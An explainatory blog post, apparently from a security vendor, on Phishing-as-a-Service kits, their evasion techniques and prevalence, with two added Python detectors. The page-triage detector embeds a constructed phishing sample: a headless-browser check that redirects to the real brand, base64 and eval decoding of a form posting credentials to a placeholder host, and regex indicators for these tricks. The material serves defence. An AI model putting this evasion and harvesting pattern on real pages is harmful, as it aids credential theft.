
Everything you need to know about Phishing-as-a-Service
What is Phishing-as-a-Service?
Phishing-as-a-Service, or PhaaS, is a cybercrime model in which threat actors sell phishing tools, kits and services to other attackers, usually as a subscription or for a one-time payment. It lowers the barrier to entry for phishing by providing ready-made templates, hosting, automation and even customer support. PhaaS lets non-technical users launch sophisticated phishing campaigns and is a major contributor to the global rise in phishing incidents.
How does PhaaS work?
- Attackers sign up for the service, often through darknet forums or Telegram channels, and get access to the provider's phishing infrastructure.
- The service supplies ready-made emails and web pages that impersonate real companies.
- The scammer customizes the messages to make them convincing.
- The emails are then sent to large numbers of recipients, who are lured to the fake pages.
- When a victim enters credentials or other private information, the scammer collects it and can use it to steal money or identities.
Who uses PhaaS?
- Attackers who want to steal credentials but don't know how to build the phishing emails, host fake Microsoft or Google login pages, intercept multifactor-authentication (MFA) tokens, or forward the stolen data to a command-and-control server.
- Sometimes even people who aren’t very tech-savvy can use PhaaS because it makes it easy for anyone to launch scams.
Why do they use PhaaS?
- It saves time and effort — they don’t have to create complicated scam setups from scratch.
- It’s often cheap or subscription-based, so it’s easy to access.
- It's now much easier to launch a sophisticated campaign targeting thousands of people with a few clicks, compared to building a traditional phishing attack by hand. These modern attacks are highly advanced: they use evasion methods to avoid detection and often rely on legitimate but compromised websites and platforms.
Who are the most common targets?
- Everyday people who get emails that look like they’re from their banks, platforms, favorite stores or services they use.
- Employees at companies — to try and sneak into company systems.
- Even small businesses or organizations that might not have strong security protections.
Why is PhaaS spreading?
- Access to these kits is easy to get because they are offered at affordable prices.
- They are more effective and have higher delivery rates than traditional attacks because the kits include tools that obfuscate (make confusing) and encrypt or encode (hide from scanners) the page source code, along with other techniques to avoid detection.
- The service hides technical complexity, so anyone can join in.
- It is hard to stop PhaaS platforms completely because:
  - They know how to stay hidden. These platforms are experts at evading security systems and law enforcement; they keep changing their websites, emails and methods so they don't get caught easily.
  - They're everywhere. PhaaS platforms operate all over the world, using servers and websites in different countries, which makes it tough to track them down or shut them off quickly.
New and emerging PhaaS attacks
PhaaS (Phishing-as-a-Service) is rapidly evolving and producing newer, more sophisticated kits that make attacks easier and more effective — especially for less technical cybercriminals.
For example, CoGUI is a new phishing kit specifically targeting Japanese organizations, showing how these tools are being tailored for specific regions and victims.
Other new and emerging phishing kits include:
- Sniper Dz – A highly customizable kit used to mimic login pages of popular services, making phishing attempts look very convincing.
- Morphing Meerkat – Known for looking up the target's email provider via DNS MX records so it can serve a matching login page, and for its ability to bypass email filters.
- Darcula – A stealthy kit that combines phishing and malware delivery, often targeting mobile users.
- SessionShark – Specializes in stealing active login sessions (the session cookies issued after a victim signs in), letting attackers hijack accounts without re-entering the password or completing MFA themselves.
What makes these kits particularly dangerous is that they constantly evolve — updating their methods to avoid being detected by security systems. This ongoing development helps scammers stay one step ahead and makes it harder to shut them down.
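Kits like SessionShark succeed because a stolen session cookie is indistinguishable from the victim's own, so defenders have to look at where a session is used rather than how it was created. The detector below is an added example (not Barracuda's code, and not taken from any kit) that flags an authenticated session presented from a different network than the one where MFA was completed. The sign-in events are constructed, and the field names (user, session, ip, asn, event) and the 30-minute window are assumptions to map onto your own identity provider's sign-in log.

```python
"""Flag reuse of an authenticated session from a second network location.

Added example, not Barracuda's code. The events below are constructed and the
field names (user, session, ip, asn, event) are assumptions; map them to your
IdP's sign-in log schema before using this on real data.
"""
from datetime import datetime, timedelta

# Assumed window: AiTM kits typically replay the stolen session within minutes
# of the victim completing MFA, so a short window keeps the alert high-precision.
WINDOW = timedelta(minutes=30)

# Constructed sign-in events (one per line, key=value fields after a timestamp).
# alice: MFA completed on AS64500, then the same session appears from AS64496
#        six minutes later (the session-theft pattern).
# bob:   session reused from another ASN hours later, outside the window.
# carol: a session that never completed MFA on this log at all.
EVENTS = [
    "2025-06-02T09:01:10Z user=alice session=s-1 ip=203.0.113.10 asn=AS64500 event=mfa_ok",
    "2025-06-02T09:01:12Z user=alice session=s-1 ip=203.0.113.10 asn=AS64500 event=access",
    "2025-06-02T09:07:45Z user=alice session=s-1 ip=198.51.100.77 asn=AS64496 event=access",
    "2025-06-02T09:30:00Z user=bob session=s-2 ip=192.0.2.5 asn=AS64501 event=mfa_ok",
    "2025-06-02T09:31:00Z user=bob session=s-2 ip=192.0.2.5 asn=AS64501 event=access",
    "2025-06-02T10:15:00Z user=carol session=s-3 ip=198.51.100.9 asn=AS64496 event=access",
    "2025-06-02T14:00:00Z user=bob session=s-2 ip=192.0.2.44 asn=AS64502 event=access",
]


def parse(line):
    """Turn one constructed event line into a dict with a datetime under 'ts'."""
    ts, *kv = line.split()
    rec = dict(p.split("=", 1) for p in kv)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def find_session_replay(lines, window=WINDOW):
    """Return (user, session, mfa_asn, seen_asn, minutes_after_mfa) tuples.

    A session is flagged when it is presented from a different ASN than the one
    where its MFA was completed, within `window` of that MFA; a session with no
    MFA on record at all is flagged with mfa_asn and minutes set to None.
    """
    mfa_origin = {}  # session id -> (mfa timestamp, ip, asn)
    alerts = []
    for rec in sorted(map(parse, lines), key=lambda r: r["ts"]):
        sid = rec["session"]
        if rec["event"] == "mfa_ok":
            mfa_origin[sid] = (rec["ts"], rec["ip"], rec["asn"])
            continue
        origin = mfa_origin.get(sid)
        if origin is None:
            alerts.append((rec["user"], sid, None, rec["asn"], None))
            continue
        ts0, _ip0, asn0 = origin
        delta = rec["ts"] - ts0
        if rec["asn"] != asn0 and delta <= window:
            minutes = int(delta.total_seconds() // 60)
            alerts.append((rec["user"], sid, asn0, rec["asn"], minutes))
    return alerts


if __name__ == "__main__":
    for alert in find_session_replay(EVENTS):
        print(alert)
```

Treat the output as an investigation lead rather than a verdict: mobile carriers and corporate VPNs change ASNs legitimately, which is why the example keys on the ASN of the MFA event rather than the raw IP and uses a short window. Widening the window catches later cookie replays at the cost of more travel and roaming noise.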
Innovative techniques in PhaaS attacks
Phishing attacks are getting smarter and trickier by using new methods to fool people and avoid being caught. Here are some of the clever tricks that scammers use in PhaaS attacks:
- Using real, trusted websites
Instead of creating fake websites from scratch, scammers often host their harmful links or files on popular, legitimate platforms. This makes it harder for people and security tools to spot that something is wrong.
- Encryption to stay hidden
They encrypt or encode their malicious page code so that it looks like gibberish to anything that inspects the page source, and only decode it in the victim's browser. This makes it tough for security software to detect and block the attack.
- Making code confusing (obfuscation)
Scammers also rewrite their code so that it is confusing and hard to follow, so even experts have a tough time figuring out what the code really does.
- Always changing their tricks
These phishing kits keep evolving. They regularly update how they work so they can slip past security defenses that get smarter every day.
- Using real but hacked websites
Attackers sometimes host their scams on legitimate websites that have been compromised. Because these sites are real and trusted, it is easier to trick victims and to pass reputation checks.
- Avoiding detection with smart checks
Some phishing pages can detect when security bots or sandbox environments are analyzing them. When that happens, or once the campaign has run its course, they redirect the visitor to the legitimate site of the brand being impersonated so nothing looks suspicious.
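Several of the tricks above leave fingerprints in the captured page source: a base64 blob decoded with atob and fed to eval, obfuscator-style identifiers, checks for navigator.webdriver or headless browser strings, and a redirect to the real brand site. The script below is an added example (not Barracuda's code) that triages a captured landing page for those fingerprints. Both sample pages are constructed, and the indicator weights, entropy cut-off and verdict threshold are assumptions to tune on your own corpus.

```python
"""Heuristic triage of a captured phishing landing page.

Added example, not Barracuda's code. It looks for the evasion tricks described
above: encoded/"encrypted" JavaScript decoded at runtime, obfuscator-style
identifiers, and bot/sandbox checks that bounce analysis tools to the real
brand site. The sample pages are constructed; weights and thresholds are
assumptions.
"""
import base64
import math
import re

# Constructed benign sample: an ordinary login form with readable scripting.
BENIGN_PAGE = """<html><body>
<form method="post" action="/login">
  <input name="user"><input name="pass" type="password">
</form>
<script>
document.querySelector('form').addEventListener('submit', e => console.log('submitted'));
</script>
</body></html>"""

# Constructed phishing sample. The payload is just a base64-encoded snippet
# built here so the blob is valid; kits hide the harvesting form and the
# exfiltration URL the same way so a scanner never sees them in clear text.
_PAYLOAD = base64.b64encode(
    b"document.write('<form action=\"https://example.invalid/post.php\" method=\"post\">');"
).decode()
PHISH_PAGE = f"""<html><body>
<script>
if (navigator.webdriver || /HeadlessChrome|PhantomJS/i.test(navigator.userAgent)) {{
  window.location.replace("https://login.microsoftonline.com/");
}}
var _0x4a2b = atob("{_PAYLOAD}");
eval(_0x4a2b);
document.write(String.fromCharCode(60,105,110,112,117,116,32,110,97,109,101,61,34,112,97,115,115,34,62));
</script>
</body></html>"""

# (name, weight, pattern). Weights are assumed values, not calibrated scores.
INDICATORS = [
    ("eval", 2, re.compile(r"\beval\s*\(")),
    ("atob", 2, re.compile(r"\batob\s*\(")),
    ("fromCharCode", 2, re.compile(r"String\.fromCharCode")),
    ("unescape", 1, re.compile(r"\bunescape\s*\(")),
    ("webdriver_check", 3, re.compile(r"navigator\.webdriver")),
    ("headless_ua_check", 3, re.compile(r"HeadlessChrome|PhantomJS|Selenium|Puppeteer", re.I)),
    ("redirect_to_brand", 1, re.compile(r"location\.(?:replace|assign|href)\W*[\"']https?://")),
    ("hex_identifier", 2, re.compile(r"\b_0x[0-9a-f]{3,}\b", re.I)),
    ("base64_blob", 2, re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
]
ENTROPY_THRESHOLD = 4.5   # bits per character; assumed cut-off for a string literal
SUSPICIOUS_SCORE = 6      # assumed verdict threshold


def shannon_entropy(s):
    """Bits per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_string_literal(page):
    """Longest quoted literal of 20+ characters; encoded payloads live here."""
    literals = re.findall(r"[\"']([^\"'\n]{20,})[\"']", page)
    return max(literals, key=len, default="")


def triage(page):
    """Return {'score': int, 'hits': [indicator names], 'verdict': 'clean'|'suspicious'}."""
    hits, score = [], 0
    for name, weight, pattern in INDICATORS:
        if pattern.search(page):
            hits.append(name)
            score += weight
    if shannon_entropy(longest_string_literal(page)) > ENTROPY_THRESHOLD:
        hits.append("high_entropy_literal")
        score += 1
    verdict = "suspicious" if score >= SUSPICIOUS_SCORE else "clean"
    return {"score": score, "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("phish", PHISH_PAGE)):
        print(label, triage(page))
```

Static indicators like these are cheap and catch lazy kits, but a page that only decodes itself after a human-interaction check will look inert to this scanner; pair it with a real browser visit from a non-automation user agent and compare what the two see.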
PhaaS kits compete with each other on the following terms
- Price and accessibility: Kits that are cheaper or easier to get tend to attract more users. Some offer subscriptions, while others sell one-time licenses. The price and payment options matter a lot.
- Updates: Some PhaaS providers offer customer support and regularly update their kits to bypass new security measures. Kits that stay updated and provide help keep their users loyal.
- Success rates: If a kit is known for helping scammers avoid detection and successfully steal information, it gains popularity over others.
Volume of PhaaS attacks
Since the beginning of 2025, approximately 60% to 70% of the phishing attacks we’ve observed have been PhaaS attacks. Among these, the most widely used kit is Tycoon 2FA, accounting for 76% of the attacks. EvilProxy makes up about 8%, while Mamba 2FA and Sneaky 2FA together represent 6%. The remaining 10% comes from various other phishing kits such as LogoKit, CoGUI, FlowerStorm, Gabagool, and others.
Note: This blog post was co-authored by Deerendra Prasad.